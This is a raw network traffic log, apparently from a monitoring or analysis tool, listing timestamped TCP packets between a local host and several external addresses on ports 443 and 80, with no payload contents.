Nov 2, 2024 17:56:36.298245907 CET	49777	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:36.298253059 CET	443	49777	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:36.298480034 CET	443	49777	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:36.302541018 CET	49777	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:36.347338915 CET	443	49777	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:36.501106024 CET	49785	443	192.168.2.7	216.58.206.78
Nov 2, 2024 17:56:36.501147985 CET	443	49785	216.58.206.78	192.168.2.7
Nov 2, 2024 17:56:36.501211882 CET	49785	443	192.168.2.7	216.58.206.78
Nov 2, 2024 17:56:36.501705885 CET	49785	443	192.168.2.7	216.58.206.78
Nov 2, 2024 17:56:36.501717091 CET	443	49785	216.58.206.78	192.168.2.7
Nov 2, 2024 17:56:36.556885004 CET	443	49777	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:36.556972980 CET	443	49777	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:36.557028055 CET	49777	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:36.557867050 CET	49777	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:36.557885885 CET	443	49777	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:36.557897091 CET	49777	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:36.557903051 CET	443	49777	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:36.659070969 CET	443	49782	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.659295082 CET	443	49781	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.659590006 CET	49782	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.659607887 CET	443	49782	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.659676075 CET	49781	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.659697056 CET	443	49781	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.661907911 CET	49782	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.661915064 CET	443	49782	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.662061930 CET	49781	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.662072897 CET	443	49781	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.680511951 CET	443	49783	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.682643890 CET	49783	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.682662964 CET	443	49783	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.683141947 CET	49783	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.683146954 CET	443	49783	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.689143896 CET	443	49779	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.692225933 CET	49779	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.692245007 CET	443	49779	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.692784071 CET	49779	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.692787886 CET	443	49779	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.740102053 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:36.740406036 CET	49787	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:36.744959116 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:36.745357037 CET	80	49787	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:36.745424032 CET	49787	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:36.745786905 CET	49787	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:36.750639915 CET	80	49787	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:36.788646936 CET	443	49781	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.788914919 CET	443	49781	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.788983107 CET	49781	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.789024115 CET	49781	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.789042950 CET	443	49781	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.789052963 CET	49781	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.789057970 CET	443	49781	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.792054892 CET	49788	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.792102098 CET	443	49788	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.792172909 CET	49788	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.792351961 CET	49788	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.792367935 CET	443	49788	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.793075085 CET	443	49784	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.793505907 CET	49784	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.793519020 CET	443	49784	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.793823004 CET	443	49782	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.793888092 CET	443	49782	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.793935061 CET	49782	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.793952942 CET	49784	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.793957949 CET	443	49784	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.794102907 CET	49782	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.794121981 CET	443	49782	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.794132948 CET	49782	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.794138908 CET	443	49782	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.796546936 CET	49789	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.796598911 CET	443	49789	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.796665907 CET	49789	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.797266960 CET	49789	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.797290087 CET	443	49789	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.811099052 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:36.811398983 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:36.811427116 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:36.812474966 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:36.812536001 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:36.814677000 CET	443	49783	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.814750910 CET	443	49783	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.814795971 CET	49783	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.814975977 CET	49783	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.814992905 CET	443	49783	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.815010071 CET	49783	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.815016031 CET	443	49783	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.820450068 CET	49790	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.820518017 CET	443	49790	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.820621014 CET	49790	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.820775032 CET	49790	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.820784092 CET	443	49790	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.822797060 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:36.822985888 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:36.822997093 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:36.824341059 CET	443	49779	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.824640036 CET	443	49779	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.824702024 CET	49779	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.824744940 CET	49779	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.824767113 CET	443	49779	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.829214096 CET	49791	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.829277039 CET	443	49791	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.829428911 CET	49791	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.831871033 CET	49791	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.831907034 CET	443	49791	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.867330074 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:36.874932051 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:36.874954939 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:36.921890020 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:36.927208900 CET	443	49784	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.927651882 CET	443	49784	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.927742958 CET	49784	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.927742958 CET	49784	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.927772999 CET	49784	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.927779913 CET	443	49784	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.930547953 CET	49792	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.930577040 CET	443	49792	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.930799961 CET	49792	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.930944920 CET	49792	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.930958033 CET	443	49792	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.079466105 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.079521894 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.079556942 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.079586029 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.079617023 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.079622030 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.079636097 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.079653025 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.079855919 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.079869032 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.088309050 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.088417053 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.088427067 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.140306950 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.140316010 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.195977926 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.202562094 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.202625036 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.203191996 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.203202009 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.204075098 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.205786943 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.205796003 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.210943937 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.211072922 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.211081028 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.217514038 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.217659950 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.217680931 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.265583038 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.265602112 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.312381029 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.325495958 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.327045918 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.327085018 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.327151060 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.327177048 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.328010082 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.328903913 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.333906889 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.333998919 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.334006071 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.345587969 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.345999002 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.346010923 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.382152081 CET	443	49785	216.58.206.78	192.168.2.7
Nov 2, 2024 17:56:37.383603096 CET	49785	443	192.168.2.7	216.58.206.78
Nov 2, 2024 17:56:37.383618116 CET	443	49785	216.58.206.78	192.168.2.7
Nov 2, 2024 17:56:37.384062052 CET	443	49785	216.58.206.78	192.168.2.7
Nov 2, 2024 17:56:37.384130955 CET	49785	443	192.168.2.7	216.58.206.78
Nov 2, 2024 17:56:37.384794950 CET	443	49785	216.58.206.78	192.168.2.7
Nov 2, 2024 17:56:37.384888887 CET	49785	443	192.168.2.7	216.58.206.78
Nov 2, 2024 17:56:37.385953903 CET	49785	443	192.168.2.7	216.58.206.78
Nov 2, 2024 17:56:37.386027098 CET	443	49785	216.58.206.78	192.168.2.7
Nov 2, 2024 17:56:37.386141062 CET	49785	443	192.168.2.7	216.58.206.78
Nov 2, 2024 17:56:37.386141062 CET	49785	443	192.168.2.7	216.58.206.78
Nov 2, 2024 17:56:37.386152983 CET	443	49785	216.58.206.78	192.168.2.7
Nov 2, 2024 17:56:37.386631012 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.386857986 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.386877060 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.431339025 CET	443	49785	216.58.206.78	192.168.2.7
Nov 2, 2024 17:56:37.437158108 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.437159061 CET	49785	443	192.168.2.7	216.58.206.78
Nov 2, 2024 17:56:37.449402094 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.449481964 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.450325012 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.450336933 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.452986956 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.453028917 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.453385115 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.453393936 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.453561068 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.455431938 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.463924885 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.464469910 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.464509964 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.509550095 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.509591103 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.509665966 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.509687901 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.510185003 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.547274113 CET	443	49789	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.550367117 CET	49789	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.550400972 CET	443	49789	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.554310083 CET	49789	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.554317951 CET	443	49789	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.557549953 CET	443	49788	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.558604002 CET	49788	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.558640957 CET	443	49788	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.558962107 CET	49788	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.558968067 CET	443	49788	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.570651054 CET	443	49791	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.571381092 CET	49791	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.571399927 CET	443	49791	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.572593927 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.572623014 CET	49791	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.572628975 CET	443	49791	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.574121952 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.574363947 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.574383974 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.576128960 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.576462030 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.576472044 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.580878973 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.581549883 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.581562042 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.584970951 CET	443	49790	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.585664988 CET	49790	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.585683107 CET	443	49790	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.586276054 CET	49790	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.586282015 CET	443	49790	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.587003946 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.587287903 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.587297916 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.632733107 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.633025885 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.633049011 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.642735958 CET	80	49787	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:37.643089056 CET	49787	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:37.659070969 CET	443	49792	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.659789085 CET	49792	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.659806013 CET	443	49792	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.660296917 CET	49792	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.660301924 CET	443	49792	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.669904947 CET	443	49785	216.58.206.78	192.168.2.7
Nov 2, 2024 17:56:37.682236910 CET	443	49789	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.682427883 CET	443	49789	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.682498932 CET	49789	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.682574034 CET	49789	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.682590008 CET	443	49789	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.682611942 CET	49789	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.682617903 CET	443	49789	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.686307907 CET	49794	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.686348915 CET	443	49794	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.686482906 CET	49794	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.686628103 CET	49794	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.686640978 CET	443	49794	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.689913988 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.689928055 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.694634914 CET	443	49788	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.694808006 CET	443	49788	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.694942951 CET	49788	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.695225954 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.695272923 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.695326090 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.695336103 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.695456028 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.697026014 CET	49788	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.697026014 CET	49788	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.697053909 CET	443	49788	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.697067976 CET	443	49788	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.699085951 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.699172020 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.699291945 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.699310064 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.700434923 CET	443	49791	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.700613976 CET	443	49791	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.700727940 CET	49791	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.701076984 CET	49791	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.701087952 CET	443	49791	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.701148033 CET	49791	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.701154947 CET	443	49791	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.704077959 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.704173088 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.704191923 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.709762096 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.709978104 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.709999084 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.719306946 CET	49785	443	192.168.2.7	216.58.206.78
Nov 2, 2024 17:56:37.719330072 CET	443	49785	216.58.206.78	192.168.2.7
Nov 2, 2024 17:56:37.719882965 CET	443	49790	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.720118999 CET	443	49790	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.722400904 CET	49790	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.725425005 CET	49790	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.725449085 CET	443	49790	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.725475073 CET	49790	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.725485086 CET	443	49790	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.731034994 CET	49795	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.731082916 CET	443	49795	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.731231928 CET	49795	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.731853962 CET	49796	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.731889963 CET	443	49796	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.732196093 CET	49796	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.733630896 CET	49797	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.733658075 CET	443	49797	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.733901024 CET	49797	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.734235048 CET	49797	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.734241962 CET	443	49797	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.734477043 CET	49796	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.734477997 CET	49795	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.734493017 CET	443	49796	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.734508038 CET	443	49795	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.750675917 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.755701065 CET	49787	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:37.756212950 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:37.760639906 CET	80	49787	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:37.766088963 CET	49785	443	192.168.2.7	216.58.206.78
Nov 2, 2024 17:56:37.784996986 CET	49746	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:37.785259008 CET	49785	443	192.168.2.7	216.58.206.78
Nov 2, 2024 17:56:37.785265923 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:37.787170887 CET	443	49792	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.787393093 CET	443	49792	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.787688971 CET	49792	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.787688971 CET	49792	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.788070917 CET	49792	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.788081884 CET	443	49792	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.790399075 CET	49798	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.790446043 CET	443	49798	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:37.790647030 CET	49798	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.790805101 CET	49798	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:37.790821075 CET	443	49798	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.034730911 CET	80	49787	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:38.034929037 CET	49787	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:38.429687023 CET	443	49794	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.430435896 CET	49794	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.430466890 CET	443	49794	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.430871964 CET	49794	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.430876970 CET	443	49794	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.468170881 CET	443	49796	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.468822956 CET	49796	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:38.468857050 CET	443	49796	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:38.469955921 CET	49796	443	192.168.2.7	13.107.246.45
